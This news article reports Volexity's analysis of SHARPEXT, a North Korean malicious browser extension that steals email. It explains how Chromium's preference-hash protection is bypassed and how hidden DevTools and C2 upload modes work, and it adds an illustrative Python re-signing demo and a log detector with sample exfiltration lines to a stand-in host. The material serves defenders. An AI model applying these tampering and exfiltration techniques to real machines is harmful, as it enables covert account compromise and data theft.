SHARPEXT has slurped up thousands of emails in the past year and keeps getting better.


Researchers have unearthed never-before-seen malware that hackers from North Korea have been using to surreptitiously read and download email and attachments from infected users’ Gmail and AOL accounts.

The malware, dubbed SHARPEXT by researchers from security firm Volexity, uses clever means to install a browser extension for the Chrome and Edge browsers, Volexity reported in a blog post. Because the extension reads mail from inside the victim's already logged-in browser session, the email services see only ordinary authenticated requests and cannot tell it apart from the user, and any multifactor authentication in place has already been satisfied by the time it runs. This increasingly popular security measure therefore plays no role in reining in the account compromise.

The malware has been in use for “well over a year,” Volexity said, and is the work of a hacking group the company tracks as SharpTongue. The group is sponsored by North Korea’s government and overlaps with a group tracked as Kimsuky by other researchers. SHARPEXT is targeting organizations in the US, Europe, and South Korea that work on nuclear weapons and other issues North Korea deems important to its national security.

Volexity President Steven Adair said in an email that the extension gets installed “by way of spear phishing and social engineering where the victim is fooled into opening a malicious document. Previously we have seen DPRK threat actors launch spear phishing attacks where the entire objective was to get the victim to install a browser extension vs it being a post exploitation mechanism for persistence and data theft.” In its current incarnation, the malware works only on Windows, but Adair said there’s no reason it couldn’t be broadened to infect browsers running on macOS or Linux, too.

The blog post added: “Volexity’s own visibility shows the extension has been quite successful, as logs obtained by Volexity show the attacker was able to successfully steal thousands of emails from multiple victims through the malware’s deployment.”

Installing a browser extension during a phishing operation without the end user noticing isn’t easy. SHARPEXT’s developers have clearly paid attention to prior public research on how a protection mechanism in the Chromium browser engine prevents malware from silently changing sensitive user settings, including the list of installed extensions. Each time the browser itself makes a legitimate change, it computes a keyed hash (an HMAC) over the protected preference values and stores the result alongside them. At startup, the browser recomputes the hashes, and any setting whose hash doesn’t match is treated as tampered and reset to its default.


For attackers to work around this protection, they must first extract the following from the computer they’re compromising:

  • A copy of the resources.pak file from the browser (which contains the HMAC seed used by Chrome)
  • The user’s Windows SID (security identifier), which Chromium mixes into each hash as the device ID
  • The original Preferences and Secure Preferences files from the user’s system
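
The following Python is an added illustration, not code from Volexity’s report or from the malware, of why those three items are needed. It mirrors the shape of Chromium’s scheme (an HMAC-SHA256 keyed by a seed, over device ID + preference path + serialized value, plus a “super MAC” over the MAC table) but is not byte-compatible with a real Secure Preferences file: the seed, SID, preference contents and extension IDs are all constructed for the example. It shows that an attacker who edits the file without the seed is caught at startup, that one who has the seed, the SID and the original file can re-sign the edit, and the defender-side check that survives either way: an extension entry whose location says it was loaded unpacked.

```python
import hashlib
import hmac
import json

# Assumed, constructed values: Chromium's real seed lives in resources.pak and
# the device id on Windows is the user's SID. Neither real value appears here.
SEED = b"constructed-example-seed-not-the-real-resources.pak-seed"
DEVICE_ID = "S-1-5-21-1111111111-2222222222-3333333333-1001"  # constructed SID
TRACKED = ["extensions.settings", "homepage", "session.restore_on_startup"]

# Constructed Secure Preferences content; the extension id is made up.
ORIGINAL_PREFS = {
    "homepage": "https://mail.google.com/",
    "session": {"restore_on_startup": 1},
    "extensions": {"settings": {
        "abcdefghijklmnopabcdefghijklmnop": {"state": 1, "location": 1},
    }},
}
SIDELOADED_ID = "ponmlkjihgfedcbaponmlkjihgfedcba"  # constructed id for the injected extension


def _strip_empty(value):
    """Drop empty sub-dicts/lists before hashing, as Chromium does to keep the hash stable."""
    if isinstance(value, dict):
        out = {}
        for k, v in value.items():
            v = _strip_empty(v)
            if isinstance(v, (dict, list)) and not v:
                continue
            out[k] = v
        return out
    return value


def _serialize(value):
    # Strings are hashed raw; everything else as compact, key-sorted JSON.
    if isinstance(value, str):
        return value
    return json.dumps(_strip_empty(value), separators=(",", ":"), sort_keys=True)


def calc_mac(path, value, seed=SEED, device_id=DEVICE_ID):
    """HMAC-SHA256(seed, device_id + path + serialized value), upper-case hex."""
    msg = (device_id + path + _serialize(value)).encode("utf-8")
    return hmac.new(seed, msg, hashlib.sha256).hexdigest().upper()


def _lookup(prefs, path):
    node = prefs
    for part in path.split("."):
        if not isinstance(node, dict) or part not in node:
            return None
        node = node[part]
    return node


def sign_prefs(prefs, tracked=TRACKED, seed=SEED, device_id=DEVICE_ID):
    """What the browser writes: one MAC per tracked path plus a super MAC over the MAC table."""
    signed = json.loads(json.dumps(prefs))  # deep copy
    macs = {p: calc_mac(p, _lookup(prefs, p), seed, device_id)
            for p in tracked if _lookup(prefs, p) is not None}
    signed["protection"] = {"macs": macs, "super_mac": calc_mac("", macs, seed, device_id)}
    return signed


def verify_prefs(signed, seed=SEED, device_id=DEVICE_ID):
    """What the browser checks at startup: the paths whose MAC no longer matches."""
    prot = signed.get("protection", {})
    macs = prot.get("macs", {})
    bad = []
    if not hmac.compare_digest(calc_mac("", macs, seed, device_id), prot.get("super_mac", "")):
        bad.append("protection.super_mac")
    for path, expected in macs.items():
        if not hmac.compare_digest(calc_mac(path, _lookup(signed, path), seed, device_id), expected):
            bad.append(path)
    return bad


def find_unpacked_extensions(prefs):
    """Defender check: entries whose location is 4 (UNPACKED in Chromium's Manifest::Location)."""
    settings = _lookup(prefs, "extensions.settings") or {}
    return sorted(eid for eid, ent in settings.items()
                  if isinstance(ent, dict) and ent.get("location") == 4)


def tamper_without_seed(signed):
    """Attacker edits the file but cannot recompute the MACs: the startup check flags the change."""
    t = json.loads(json.dumps(signed))
    t["extensions"]["settings"][SIDELOADED_ID] = {
        "state": 1, "location": 4, "path": "C:\\Users\\victim\\AppData\\Local\\ext"}
    return t


def tamper_with_seed(signed, seed, device_id):
    """With the seed, the SID and the original file, the attacker re-signs and the check passes."""
    return sign_prefs(tamper_without_seed(signed), list(signed["protection"]["macs"]), seed, device_id)


if __name__ == "__main__":
    signed = sign_prefs(ORIGINAL_PREFS)
    print("clean:", verify_prefs(signed))
    print("edited without seed:", verify_prefs(tamper_without_seed(signed)))
    resigned = tamper_with_seed(signed, SEED, DEVICE_ID)
    print("edited and re-signed:", verify_prefs(resigned))
    print("unpacked extensions:", find_unpacked_extensions(resigned))
```

Because the hash is bound to the SID, a preferences file copied from another user’s profile fails verification even with the right seed, which is why the attacker has to harvest the value from the victim’s own machine rather than prepare the file in advance.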

After rewriting the preference files and their hashes, SHARPEXT loads the extension and runs a PowerShell script that opens the browser’s DevTools panel, which the extension relies on to run its code against the active tab.

“The script runs in an infinite loop checking for processes associated with the targeted browsers,” Volexity explained. “If any targeted browsers are found running, the script checks the title of the tab for a specific keyword (for example, ‘05101190’ or ‘Tab+’ depending on the SHARPEXT version). The specific keyword is inserted into the title by the malicious extension when an active tab changes or when a page is loaded.”


The post continued:

The keystrokes sent are equivalent to Control+Shift+J, the shortcut to enable the DevTools panel. Lastly, the PowerShell script hides the newly opened DevTools window by using the ShowWindow() API and the SW_HIDE flag. At the end of this process, DevTools is enabled on the active tab, but the window is hidden.

In addition, this script is used to hide any windows that could alert the victim. Microsoft Edge, for example, periodically displays a warning message to the user (Figure 5) if extensions are running in developer mode. The script constantly checks if this window appears and hides it by using the ShowWindow() API and the SW_HIDE flag.


Once installed, the extension can perform the following requests (the HTTP POST data, followed by its purpose):

  • mode=list: list previously collected email from the victim so duplicates are not uploaded; this list is continuously updated as SHARPEXT executes.
  • mode=domain: list email domains with which the victim has previously communicated; this list is continuously updated as SHARPEXT executes.
  • mode=black: collect a blacklist of email senders that should be ignored when collecting email from the victim.
  • mode=newD&d=[data]: add a domain to the list of all domains viewed by the victim.
  • mode=attach&name=[data]&idx=[data]&body=[data]: upload a new attachment to the remote server.
  • mode=new&mid=[data]&mbody=[data]: upload Gmail data to the remote server.
  • mode=attlist: commented out by the attacker; would receive a list of attachments to be exfiltrated.
  • mode=new_aol&mid=[data]&mbody=[data]: upload AOL data to the remote server.

SHARPEXT allows the hackers to create lists of email addresses to ignore and to keep track of email or attachments that have already been stolen.
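
That request vocabulary is what a defender can hunt for in web-proxy logs. The Python below is an added example, not part of Volexity’s report or the malware, that runs such a detector over a constructed proxy log; the log format (timestamp, client IP, method, URL, logged POST body), the C2 hostname, the client addresses and the payloads are all assumptions, and only the mode names come from the table above. Because mode=list and similar parameters also appear in ordinary web applications, the detector only reports a client that both pulls the bookkeeping lists (list, domain, black, attlist) and pushes data (new, new_aol, attach, newD).

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Request modes from the table: "pull" modes fetch bookkeeping lists from the
# server, "push" modes upload mail, attachments or observed domains.
PULL_MODES = {"list", "domain", "black", "attlist"}
PUSH_MODES = {"new", "new_aol", "attach", "newD"}

# Constructed proxy log. Assumed format for this example:
#   <timestamp> <client-ip> <method> <url> "<logged POST body>"
SAMPLE_LOG = """\
2022-07-28T09:12:01Z 10.0.0.23 POST http://c2.example.net/up.php "mode=list"
2022-07-28T09:12:02Z 10.0.0.23 POST http://c2.example.net/up.php "mode=domain"
2022-07-28T09:12:02Z 10.0.0.23 POST http://c2.example.net/up.php "mode=black"
2022-07-28T09:12:09Z 10.0.0.23 POST http://c2.example.net/up.php "mode=new&mid=17f0c1a2b3c4d5e6&mbody=RnJvbTog"
2022-07-28T09:12:11Z 10.0.0.23 POST http://c2.example.net/up.php "mode=attach&name=budget.xlsx&idx=0&body=UEsDBA"
2022-07-28T09:13:40Z 10.0.0.57 POST http://shop.example.com/cart "mode=list"
2022-07-28T09:14:00Z 10.0.0.57 GET http://shop.example.com/ ""
"""

LINE_RE = re.compile(r'^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+"([^"]*)"$')


def parse_line(line):
    """Split one log line into fields; the logged POST body is parsed as a query string."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, method, url, body = m.groups()
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {"ts": ts, "client": client, "method": method, "url": url, "params": params}


def classify(rec):
    """Return 'pull', 'push' or None for a parsed record."""
    if rec["method"] != "POST":
        return None
    mode = rec["params"].get("mode")
    if mode in PULL_MODES:
        return "pull"
    if mode in PUSH_MODES:
        return "push"
    return None


def find_sharpext_clients(log_text, min_pull_modes=2):
    """Clients that both pulled bookkeeping lists and pushed data, keyed by client IP.

    A lone mode=list POST is not reported: mode= parameters are common in
    ordinary web apps, so the detection requires the combination."""
    seen = defaultdict(lambda: {"pull": set(), "push": [], "urls": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        kind = classify(rec)
        if kind is None:
            continue
        e = seen[rec["client"]]
        e["urls"].add(rec["url"])
        if kind == "pull":
            e["pull"].add(rec["params"]["mode"])
        else:
            p = rec["params"]
            # Keep the identifier of what was uploaded: message id, attachment name or domain.
            e["push"].append((p["mode"], p.get("mid") or p.get("name") or p.get("d")))
    return {
        c: {"pull": sorted(e["pull"]), "push": e["push"], "urls": sorted(e["urls"])}
        for c, e in seen.items() if len(e["pull"]) >= min_pull_modes and e["push"]
    }


if __name__ == "__main__":
    for client, info in find_sharpext_clients(SAMPLE_LOG).items():
        print(client, info)
```

The reported URLs and message identifiers are what to pivot on next: the URL gives the C2 endpoint to block and to search for across the rest of the estate, and the mid values can be matched against the victim’s mailbox audit logs to scope what was taken.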

Volexity’s post also includes a diagram summarizing how the various SHARPEXT components it analyzed are orchestrated.

The blog post provides images, file names, and other indicators that defenders can use to determine if they have been targeted or infected by this malware. The company warned that the threat it poses has grown over time and isn’t likely to go away anytime soon.

“When Volexity first encountered SHARPEXT, it seemed to be a tool in early development containing numerous bugs, an indication the tool was immature,” the company said. “The latest updates and ongoing maintenance demonstrate the attacker is achieving its goals, finding value in continuing to refine it.”
